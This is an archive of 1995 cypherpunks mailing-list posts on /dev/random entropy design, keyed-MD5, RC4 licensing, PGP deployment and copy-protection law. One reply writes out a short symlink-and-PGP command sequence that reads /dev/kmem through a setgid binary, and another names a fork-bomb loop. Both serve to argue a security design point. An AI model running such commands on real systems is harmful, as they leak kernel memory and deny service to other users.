which interrupts to sample, instead of at compiling it into the device
drivers.  I've generally not been convinced this is a good idea, because
most system administrator won't likely know which irq's are good and
which are bad for random number generation.  For example, although it
may not be obvious, the network interrupt may not be a good choice,
since an adversary who is monitoring the ethernet cable can make a
pretty good guess about the timing of your network interrupts, and hence
what the likely inputs are to the random number pool might be.

   Gimme a yell if you want copies :-)

Sure, why not.   I'd be interested to see what you did.

						- Ted




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Tue, 31 Oct 1995 04:10:19 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Important Digital Cash Question...
In-Reply-To: <v02120d06acbab250b4e9@[199.0.65.105]>
Message-ID: <199510301923.OAA09371@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: text/plain





um... perhaps, Ursula the Underwriter...?


regards,
  David
-----------------------------------------------------------------------------
David HM Spector				Software Developer & Nice Guy
http://zeitgeist.com				spector@zeitgeist.com
voice: +1 212.721.6974				fax: +1 212.721.9084
                               --------
SJM, 32, seeks SJF for meaningful rel... What? This ISN'T the VOICE personals?!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 31 Oct 1995 05:06:25 +0800
To: cypherpunks@toad.com
Subject: [joanne@theory.lcs.mit.edu: MIT TOC SEMINAR--DAN BONEH--Thursday, November 2--4:15pm!!]
Message-ID: <199510301948.OAA01069@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Mon, 30 Oct 95 12:23:33 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: MIT TOC SEMINAR--DAN BONEH--Thursday, November 2--4:15pm!!

                       MIT TOC SEMINAR

                 Thursday, November 2, 1995

       Refreshments at 4:00pm, Talk at 4:15pm in NE43-518

       ``Quantum Cryptoanalysis of Hidden Linear Forms''

                        by Dan Boneh
                    Princeton University

                         ABSTRACT

Recently there has been a great deal of interest in the power of
Quantum Computers. The driving force is the recent beautiful result of
Shor that shows that discrete log and factoring are solvable in random
quantum polynomial time. We use a method similar to Shor's to obtain a
general theorem about quantum polynomial time. We show that any
cryptosystem based on what we refer to as a `hidden linear form' can
be broken in quantum polynomial time. Our results imply that the
discrete log problem is doable in quantum polynomial time over any
group including Galois fields and elliptic curves.

Joint work with Richard Lipton.

Host: Shafi Goldwasser




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 31 Oct 1995 05:33:45 +0800
To: ses@tipper.oit.unc.edu
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510301954.AA07200@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>At the moment, I'm thinking of making the mandatory schemes be Keyed MD5
>for authentication, and weakened RC4 with an IV for confidentiality, with
>the added stipulation being that the user must be informed when key
>weakening is being used. I may swap RC4 for DES; they're both public 
>domain, but RC4 is simpler. They're both shared key, but I don't make PK 
>stuff mandatory. 

The licensed version of RC4, or the software that was posted anonymously?

Do you really feel comfortable basing an IETF standard on that?  When
you use the term RC4 do you mean the real version or the posted one,
what will you do if they ever conflict?  Can you even use the name RC4
for the posted version?  It seems to me that RC4 means the RSA licensed
code, which presumably you wanted to avoid when you wrote no mandatory PK.

Where would you swap RC4 for DES?

I assume your added stipulation is a "should" not a "must" item.

How are you going to handle key management and naming?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 31 Oct 1995 05:27:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <199510302038.PAA21082@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon writes:
> I may swap RC4 for DES; they're both public domain, but RC4 is simpler. 

Er, at last report RSADSI was still claiming RC4 as a trade secret, in spite
of the posting of the (convincing) alleged RC4.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 30 Oct 1995 13:05:32 +0800
To: jirib@cs.monash.edu.au
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <199510272049.NAA29753@netcom7.netcom.com>
Message-ID: <199510300447.PAA19230@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Steven Levy <steven@echonyc.com>
  and cypherpunks@toad.com
  and "Vladimir Z. Nuri" <vznuri@netcom.com>

V.Z.N (order of paragraphs rearranged by J.B.):
...
> I would suggest to all companies developing e-cash that they print up
> a carefully designed FAQ in which their cash properties 
> are compared directly with parallel
> properties of credit cards such as like the item above, because the
...

Well, why not one of us?

Please have a look at http://www.cs.monash.edu.au/~jirib/ecash-cc.html
and tell me what you think. Any good?

...
> how would the bank handle a situation in which the consumer says, "oops,
> my hard drive was compromised. all of the following cash was NOT spent
> by me."
...

Easy: whoever is at the bank first gets the cash. So you simply spend
all the coins (ie deposit it back to your account), and that's that.

...
> or, the bank might say, "oh, well, that cash was not spent yet. we can issue
> a replacement and bar the cash from being spent".
...

Yup. No special protocol is needed, either.

...
> S.L.:
> >Question: will people's worries about losing their e-money lead them to 
> >accept a higher degree of tracibility as a tradeoff?  
...

I read in the newspaper that the "Eros Foundation" (or whatever the name
is) has the second-largest mailing list in Australia. (The article was
about how they could affect elections should one or the other party promise
to ban X (non-violent erotica), and generally concluded that they could,
if they haven't already.) I wonder if that'd be a good market for
untraceable transactions?


Please tell me what you think of the page...
http://www.cs.monash.edu.au/~jirib/ecash-cc.html

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMJRYwCxV6mvvBgf5AQH+0QQAsAldRTy6AfXNB5f3+Edgr/Bsww+9gIdX
ZTwpWucd4yZof133m5p/qtKeu9KO2qrjBUBQB1W8L35i2O74+FLK2QX5BMftPCU0
F3ClojnayS8J7JZ6gJ42l8uKYglefQ/EnooEHVGO7RTF4t2gaIlstcm0QkdzPQzH
DbHjxVc+XvM=
=2wPg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 07:10:10 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301925.VAA27116@grumble.grondar.za>
Message-ID: <9510302119.AA24959@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 21:25:50 +0200
   From: Mark Murray <mark@grondar.za>

   Version 0.92 21st Sept 1995.

Yup, there's a more recent version in the Linux tree at this point.

   Something I didn't mention earlier; we felt that letting the unwashed
   masses read /dev/*random was not a good idea, as they could deplete
   the pool of entropy all to easily for attack purposes. 

That should be a system administration issue.  If someone wants to make
/dev/random readable only by root at their site, that's their business.
I don't see any point in trying to enforce that in the kernel code.

I don't agree that restricting read access is useful.  First of all, if
the pool of entropy is depleted, someone who tries to obtain entropy by
reading /dev/random will know that they didn't get enough entropy.  So
assuming a program that actually checks return values from system calls,
this is at worse a denial of service attack, and there are much easier
ways of performing those srots of attacks: "while (1) fork()", for
example.

Secondly, making /dev/random only readable by "privileged programs"
means that people won't be able to compile their own version of PGP that
can take advantage of the random number generator.  Instead, they would
have to use a setuid version of PGP, and I'm quite sure PGP wasn't
written such that it would be safe to turn on its setuid bit.  

Finally, even if you did have trustworthy applications which you could
setuid and only allow those programs to have access to /dev/random,
someone who repeatedly ran those applications could still end up
depleteing the pool of entropy.

So in the general case I would advise that /dev/random be left world
readable, since you *do* want general user programs to have access to
high quality random numbers.  

   For the same (or similar) reason, giving the said unwashed masses
   _write_ privelige might allow them to set /dev/*random to a known
   state. You've probably already thought of this, but I just had to say
   it :-).

Again, /dev/random can be set to whatever permissions the system
administrator wants.  Secondly, writing to /dev/random merely adds
randomness to the pool, via the mixing algorithm.  It won't actually
permit people to *set* the state of the pool, and assuming that the
state of the pool is not known before the write operation, writing to it
won't allow the user to know what the state is after the write
operation.

The ioctl() which sets the entropy estimate, however, *does* need to be
runnable only by the superuser, however, since that does represent an
attack path.

And, for race condition reasons, something which I need to implement
soon is an ioctl(), usuable only by root, that simultaneously updates
the entropy estimate *and* submits data to be mixed into the pool.  (Why
this is necessary should be obvious after a few minutes thought.)

   > For example, although it
   > may not be obvious, the network interrupt may not be a good choice,
   > since an adversary who is monitoring the ethernet cable can make a
   > pretty good guess about the timing of your network interrupts, and hence
   > what the likely inputs are to the random number pool might be.

   Are you sure about this? The stochastisity if this would be pretty
   hefty. Not only would our attacker have to get the _time_ that the
   interrupt occurred (if it interrupted our machine), he would then have
   to process in brute-force mode all possible times in his error range.
   What is more, more interrupts are coming in...

I didn't say that it would be trivial for an attacker to do this, but
it's certainly *doable*.  Some of the network traffic analyzers that
have been made available (I think Sandia National Labs has one that does
this), records down to millisecond accuracy when a packet was sniffed on
the network.  

For this reason, people shouldn't really trust initializing PGP's random
number generator over a network connection, since it is possible for an
adversary to obtain very high quality timings of when your telnet or
rlogin packets appeared on the network, and hence be able to guess
(within some error range) what the interkeyboard timings which PGP used
to initialize its random number generator.

The adversary might have to try a large number of possibilities, but if
the number of possibilities is less than a brute-force search, you
definitely have a weakness --- a fact which Netscape learned to its
embarassment a few weeks ago.

   Hokay! Please also send me _your_ latest. (BTW - did Linus put it in
   his latest kernel?)

Yup.  1.1.34 and higher has most of my changes.  (I'm still making
changes which are still in development, though.  Mostly incremental
improvements of one sort or another.)

							- Ted




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 31 Oct 1995 09:14:59 +0800
To: black@sunflash.eng.usf.edu
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SUN.3.91.951030134533.5999A-100000@sunflash.eng.usf.edu>
Message-ID: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>  Since you deal with security issues maybe you can help me to learn 
>about some issues with encryption.  I am talking with one of the 
>administration people about putting PGP on the system for everyone to 
>use, but there are issues for them (the admin) as they might be liable, 
>even if they can't read the e-mail.  What other legal considerations 
>should be evaluated?
>  Is there any large organizations (like any other universities) that 
>allow their students to use PGP, and have the system in place to make it 
>easier for the students?  If it is offered here I might be the one to add 
>to the mail program (pine) that is generally used to transparently use 
>PGP, which is what I mean by having a system set up for the encryption. 
>  Thanx for any help.  Take care and have fun.
>
>James Black
>black@suntan.eng.usf.edu
>
>
We have approx 1000 machines and 5000 user accounts and have pgp installed.
I can't think of any reason not to have it installed, and lots of good
reasons for having it installed.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 07:47:22 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510302148.XAA00832@grumble.grondar.za>
Message-ID: <9510302225.AA25562@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 23:48:24 +0200
   From: Mark Murray <mark@grondar.za>

   > Secondly, making /dev/random only readable by "privileged programs"
   > means that people won't be able to compile their own version of PGP that
   > can take advantage of the random number generator.  Instead, they would
   > have to use a setuid version of PGP, and I'm quite sure PGP wasn't
   > written such that it would be safe to turn on its setuid bit.  

   How about SetGID? We were going for 660 root.kmem.

Bad idea; anyone who can run PGP could then get instant access to kmem

	cd /tmp
	ln -s /dev/kmem foo
	pgp -e tytso foo
	rm foo
	pgp foo.pgp

   > Again, /dev/random can be set to whatever permissions the system
   > administrator wants.  Secondly, writing to /dev/random merely adds
   > randomness to the pool, via the mixing algorithm.  It won't actually
   > permit people to *set* the state of the pool, and assuming that the
   > state of the pool is not known before the write operation, writing to it
   > won't allow the user to know what the state is after the write
   > operation.

   What happens if some attacker does:

   for (;;) {
	   write_to_devrandom(NULL);
	   check_to_see_if_state_is_crackable();
   }

   ? "Gut feel" suggests to me that large ammounts of "predicted" input might
   be worse than the normal sort of system noise you have been using.

But keep in mind that what we're doing is XOR'ing the input data into
the pool.  (Actually, it's a bit more complicated than that.  The input
is XOR'ed in with a CRC-like function, generated by taking an
irreducible polynomial in GF(2**128).  But for the purposes of this
argument, you can think of it as XOR.)  So since you don't know what the
input state of the pool is, you won't know what the output state of the
pool.

Also, you never get to see the actual state of the pool, even when you
read out numbers from /dev/random.  What you're getting is a *hash* of
the pool.  So if you can actually implement
check_to_see_if_state_is_crackable(), then you've found a weakness in
MD5 (or SHA, to which I'll probably be switching in the near future).

   > And, for race condition reasons, something which I need to implement
   > soon is an ioctl(), usuable only by root, that simultaneously updates
   > the entropy estimate *and* submits data to be mixed into the pool.  (Why
   > this is necessary should be obvious after a few minutes thought.)

   Clue me in - I'm not quite with you? :-)

Consider this scenario:

1)  Process one writes randomness to /dev/random.

2)  Process two immediately consumes a large amount of randomness using
/dev/urandom, so that the effective randomness is now zero.

3)  Process two uses the ioctl() to bump the entropy count by the amount
of randomness added in step 1.  Unfortunately, that entropy was already
consumed in step 2.

   > I didn't say that it would be trivial for an attacker to do this, but
   > it's certainly *doable*.  Some of the network traffic analyzers that
   > have been made available (I think Sandia National Labs has one that does
   > this), records down to millisecond accuracy when a packet was sniffed on
   > the network.  

   Is this millisecond accuracy quantifiable in terms of bits of entropy?
   if so, the ethernet is surely safe?

Well, no.  If you're only using as your timing the 100Hz clock, the
adversary will have a better timebase than you do.  So you may be adding
zero or even no bits of entropy which can't be deduced by the adversary.

This is even worse in the PGP keyboard timing case, since the adversary
almost certainly can find a better time resolution to measure your
incoming packets when compared to the timing resolution that most
programs have.  Far too many Unix systems only make a 100Hz clock
available to the user mode, even if you have a better quality high
resolution timing device in the kernel (for example, the Pentium cycle
counting register).

   Again, if you can quantify the number of possibilities into bits of entropy,
   your code is good. Depending on current technology, this may have to change.

The problem is that in order to do this requires making assumptions
about what the capabilities of your adversary are.  Not only does this
change over time, but certain adversaries (like the NSA) make it their
business to conceal their capabilities, for precisely this reason.

So I like to be conservative and use limits which are imposed by the
laws of physics, as opposed to the current level of technology.  Hence,
if the packet arrival time can be observed by an outsider, you are at
real risk in using the network interrupts as a source of entropy.
Perhaps it requires buidling a very complicated model of how your Unix
scheduler works, and how much time it takes to process network packets,
etc.  ---- but I have to assume that an adversary can very precisely
model that, if they were to work hard enough at it.

People may disagree as to whether or not this is possible, but it's not
prevented by the laws of physics; merely by how much effort someone
might need to put in to be able to model a particular operating system's
networking code.  In any case, that's why I don't like depending on
network interrupts.  Your paranoia level may vary.

						- Ted




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 31 Oct 1995 10:17:33 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <doug-9509302237.AA0062331@netman.eng.auburn.edu>
Message-ID: <Pine.ULT.3.91.951030172150.26310H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Doug Hughes wrote:

> >  Since you deal with security issues maybe you can help me to learn 
> >about some issues with encryption.  I am talking with one of the 
> >administration people about putting PGP on the system for everyone to 
> >use, but there are issues for them (the admin) as they might be liable, 
> >even if they can't read the e-mail.  What other legal considerations 
> >should be evaluated?
> >  Is there any large organizations (like any other universities) that 
> >allow their students to use PGP, and have the system in place to make it 
> >easier for the students?  If it is offered here I might be the one to add 
> >to the mail program (pine) that is generally used to transparently use 
> >PGP, which is what I mean by having a system set up for the encryption. 
> >
> We have approx 1000 machines and 5000 user accounts and have pgp installed.
> I can't think of any reason not to have it installed, and lots of good
> reasons for having it installed.

"Me too," except the numbers are higher.

I would think that you would worry more about your users getting a false
sense of security from storing secret keys on a large multiuser system
than about being held liable for naughty PGP-encrypted traffic. I don't 
see how you could be held liable anyway. How is PGP that much different 
from allowing your users to set a password on their account? It makes it 
harder for root to invade their privacy, but in general, we have very 
stringent requirements that must be satisfied before we'll read user 
directories or mail.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 10:21:14 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510302351.AA28243@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.951030172638.429C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995 hallam@w3.org wrote:

> 	Do not spec Keyed MD5, it is a complete looser. It is actually weak
> against a number of attacks. There are much better constructs for creating

What I've heard is that there are some worries about using short 
constants with MD5; maybe you could fill us in on the naughty stuff 
(someone said there were a load of papers in Crypto '95 on the subject?)

> 
> 	There is some work by Phil Rogaway on making keyed digest functions
> which I strongly recommend people look at. I can post a paper on the subject if 
> people are interested.

Hey, you got a web-site? :-)

Simon

----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 31 Oct 1995 10:24:00 +0800
To: cypherpunks@toad.com
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9509308151.AA815103202@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon,
        There are a few different ways to add key material to MD5 to
make it suitable as a shared-secret authenticator function.  Some of these
are less resistant to attacks than others.  For example, the keyed MD5
mechanism that is part of the current IPsec specifications can be
attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
also require that the shared MD5 key be changed every 2**32 messages,
so this attack is unlikely to succeed.  Specifically, IPsec uses
MD5 as follows:  X = MD5(key | keypad | Message), where "|" means
concatenation and the "keypad" pads out the key to 512 bits.
Basically, this function is the same as standard MD5 with a
different initialization vector for the compression operation
on the first block of the message.
        RSA Labs recommends that a people use an authenticator like
X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext
attacks that were published at the crypto conference in Spring 1995.
        There are also some very fast MAC algorithms being proposed
these days.  As Phill Hallam mentioned, you may want to look at the
work of Phil Rogaway.  At a minimum, make sure that your standard
allows people to migrate from a current solution based on MD5 to a
future solution based on new functions.  However, I would be relunctant
to require new functions until they have had a chance to be tested
by the cryptographic research community.
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Tue, 31 Oct 1995 10:45:15 +0800
To: "'cypherpunks@toad.com>
Subject: Article on PGP (Noise)
Message-ID: <01BAA6F2.B9A98120@king1-20.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

        C'punks
        I saw a good article on PGP in this month's issue of American
Survival Guide. Not only did the article portray the use ofstrong crypto as a
good thing for privacy and liberty, it also tells the reader where to
obtain PGP. After that, the article goes into some of the issues surrounding
PGP such as ITAR, Phil Zimmerman's legal troubles (It even tells how to
contribute to his legal fund.) and how the government is really against it.
        After the background, the article gives clear, detailed, step by step
instructions on how to use it; from the inital unzipping of the program to
setup and key generation and management.
        All in all, I found this a very informative article for the new user
and even some of the more advanced users (Hey-you learn something new every
day, right?).
        It wasn't the type of article that wouldn't be covered in Time
or Newsweak that's for sure.

Eric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMJWDeyQV+sMsxjC5AQGT9QH9E8BHovGCmu7p9wB2nYQzmebqFPw3sfnR
2CuFTSvkdbg/4yArOsE87S+g28I2B/tscaVYdAO8HA5CdhVVAxbH0w==
=wjpi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Tue, 31 Oct 1995 03:14:14 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <Pine.3.89.9510301809.A11286-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Oct 1995, Bill Stewart wrote:

> More of a problem with this system is that it's only useful for terminal
> remailers; to use it in the middle of a chain, the next remailer would
> need to be configured to auto-accept such messages, or else your remailer
> would need to have a list of known remailers and use direct delivery
> for all mail sent to them.

That's not a problem with Mixmaster, as it already knows whether the 
message is the last hop of a chain or not. I was hoping to get my hack 
finished this weekend, but got caught up in CTCP instead (which I'll 
release once I find out why it kills my xterm on exit 8-()..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 02:42:16 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510301816.UAA14080@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    > > On this same track, I suggest that "/dev/random" devices for unix are
>    > > an excellent idea. Ted Tso did one for Linux that steals all the bits
>    > > of semi-random timing information it can.
>    >
>    > Anyone know where I can find more information on this wonderful device?
> 
> I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus.
> There's a fairly long exposition at the beginning of
> drivers/char/random.c which explain its theory of operation.

A colleague drew my attention to this, and I was so pleased with it that
I ported it to FreeBSD.

I kept the interface as close to the original as I could, but made some
changes for efficiency and ease:

1) I turned the huge comment at the top explaining the theory of operation
into a man page (random(4)).

2) We felt that hooking all interrupts might be dangerous. IDE drives can
interrupt at a heck of a rate, and so can some serial ports, and we felt
that in these cases _not_ using the interrupt was a good idea. So I
added an ioctl to allow the superuser to select his own set, appropriate
to the hardware in use. It is nearly impossible to do this automatically.

Gimme a yell if you want copies :-)

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Tue, 31 Oct 1995 10:30:26 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.ULT.3.91.951030172150.26310H-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951030203059.17469B-100000@yes>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 30 Oct 1995, Rich Graves wrote:

> On Mon, 30 Oct 1995, Doug Hughes wrote:
> 
> I would think that you would worry more about your users getting a false
> sense of security from storing secret keys on a large multiuser system
> than about being held liable for naughty PGP-encrypted traffic. I don't 
> see how you could be held liable anyway. How is PGP that much different 
> from allowing your users to set a password on their account? It makes it 
> harder for root to invade their privacy, but in general, we have very 
> stringent requirements that must be satisfied before we'll read user 
> directories or mail.

  As a student I am concerned with the false security, and that was 
mentioned while we were talking (today).  As to liability, it is 
important that no one can come back and hold the school liable.  Once the 
messages can be encrypted then it is harder to read the messages, but not 
impossible, unless the students keep the key on a disk, and just ftp it 
into the account everytime.  The fact is that that won't be the rule, so 
the admin can still read messages, but there will need to be clear-cut 
reasons for them to do that (IMOHO).  I am curious what requirements must 
be met.  I guess there are more schools that allow this than I expected 
<g>.  Well thanx for replying.  Take care and have fun.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 31 Oct 1995 10:33:09 +0800
To: cypherpunks@toad.com
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <Pine.BSD/.3.91.951030203647.3975A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


>>  S. 1284,  s1201:  "No person shall import, manufacture or distribute
>>  any device, product, or component incorporated into a device or
>>  product, or offer or perform any service, the primary purpose or
						  ^^^^^^^^^^^^^^^

>IANAL, but I thought these types of laws were already tested and deemed  
>unconstitutional in cases involving video-tape copying boxes, dual 
video  
>cassette dubbing decks, SCMS 'scrubbers', etc...

I think the large gray area here is the phrase primary purpose.  The 
primary purpose of a device is in the users mind only.  Videotape copying 
of noncopyright materials is done on a vast scale now due to home 
camcorders.  But even if only a few people had camcorders they should be 
able to purchase equipment that can be used legally.

Introducing the concept of "primary purpose" makes law abiding citizens 
suffer because some people are breaking the law.  If an item has any 
legal purpose it must be allowed.

This trend to take technology that *can* be used to commit crimes out of
the hands of citizen units is growing.  We see it with crypto export
controls and recently with the PA law and Federal law making it a crime to
posess devices and software to reprogram cell phones. 

When this doesn't make a dent in the number of these crimes I predict we 
will see licensing of technologies such as eeprom programmers, spectrum 
analyzers, frequency counters, and yes of course strong crypto.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 31 Oct 1995 12:59:02 +0800
To: cypherpunks@toad.com
Subject: Copy Protection Schemes
Message-ID: <acbae24801021004348b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 10/30/95, Andrew Loewenstern wrote:

>IANAL, but I thought these types of laws were already tested and deemed
>unconstitutional in cases involving video-tape copying boxes, dual video
>cassette dubbing decks, SCMS 'scrubbers', etc...

The copy-defeat and SCMS scrubbers exist in a legal limbo, mainly being
sold for "other purposes" and often by companies which come and go in the
back pages of audio and video magazines.

For example, I've used a audio gadget (Audio Alchemy "DTI") that reclocks
the bit stream out of a digital source (CD or DAT player)...one of the side
effects is that it also strips (or resets, to be more precise) the SCMS
bits on a DAT recording. Effectively, it defeats the SCMS (Serial Copy
Management System) copy protection scheme. The company that makes it is of
coure well aware of this side effect, as is the audiophile/DAT community,
but the company (Audio Alchemy) takes great pains _not_ to mention this
side effect in their literature.

Likewise, the various Macrovision video copy protection scheme defeaters,
such as may be found in the back pages of video magazines, are "for the
legitimate user only."

I'm fairly certain that any open and aboveboard advertising of such
products as "copy protection defeaters" would face legal challenges under
the copyright laws.

The Go Video and other dual-cassette systems have ostensible legitimate
uses (notably, copying of tapes one has made, perhaps of lectures or
speeches or other personal recordings) and have been "allowed." In
particular, Go Video was held up in its plans for a couple of years while
lawyers and regulators negotiated.

Other cases, such as the Sony-Disney Betamax case, and, indeed, the Xerox
machine itself, involve other issues. Practicalities of enforcement are one
of the most important issues. The Supreme Court obviously looked at the
noninfringing uses (home movies, for example), the difficulty of enforcing
laws against the taping of television shows and movies, etc., and concluded
that technology and markets had made that particular aspect of copyright
law moot. The rationale of "time-shifting" was just the best face they
could put on it, in my view.

Anyway, there are lots of issues and lots of nuances.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Tue, 31 Oct 1995 05:12:39 +0800
To: "Theodore Ts'o" <tytso@MIT.EDU>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199510301925.VAA27116@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


>    Date: Mon, 30 Oct 1995 20:16:24 +0200
>    From: Mark Murray <mark@grondar.za>
> 
>    A colleague drew my attention to this, and I was so pleased with it that
>    I ported it to FreeBSD.
> 
> Which version did you grab?  More recent versions of the driver use a
> more efficient mixing algorithm suggested by Colin Plum.  There's also
> the beginnings of support for user-mode deamons to add randomness into
> the random pool by writing to /dev/random.  I also added support for
> reading the instruction timing register for x86 platforms that support
> it. 

Version 0.92 21st Sept 1995.

Something I didn't mention earlier; we felt that letting the unwashed
masses read /dev/*random was not a good idea, as they could deplete
the pool of entropy all to easily for attack purposes. For the same
(or similar) reason, giving the said unwashed masses _write_ privelige
might allow them to set /dev/*random to a known state. You've probably
already thought of this, but I just had to say it :-).

>    2) We felt that hooking all interrupts might be dangerous. IDE drives can
>    interrupt at a heck of a rate, and so can some serial ports, and we felt
>    that in these cases _not_ using the interrupt was a good idea. So I
>    added an ioctl to allow the superuser to select his own set, appropriate
>    to the hardware in use. It is nearly impossible to do this automatically.
> 
> Indeed; I can't emphasize this enough.  The clock interrupt, for
> example, is a very bad irq to try to use.  In the Linux driver, only
> device drivers who register their interrupt driver with the
